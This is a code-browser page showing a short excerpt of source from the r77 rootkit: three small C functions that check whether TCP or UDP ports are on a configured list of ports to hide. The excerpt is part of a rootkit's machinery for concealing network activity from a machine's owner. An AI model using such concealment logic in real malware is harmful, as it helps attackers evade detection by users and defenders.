MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / IsTcpRemotePortHidden

Function IsTcpRemotePortHidden

r77/Config.c:82–85  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

80 return Configuration && IntegerListContains(Configuration->HiddenTcpLocalPorts, port);
81}
82BOOL IsTcpRemotePortHidden(USHORT port)
83{
84 return Configuration && IntegerListContains(Configuration->HiddenTcpRemotePorts, port);
85}
86BOOL IsUdpPortHidden(USHORT port)
87{
88 return Configuration && IntegerListContains(Configuration->HiddenUdpPorts, port);

Callers 1

Calls 1

IntegerListContainsFunction · 0.85

Tested by

no test coverage detected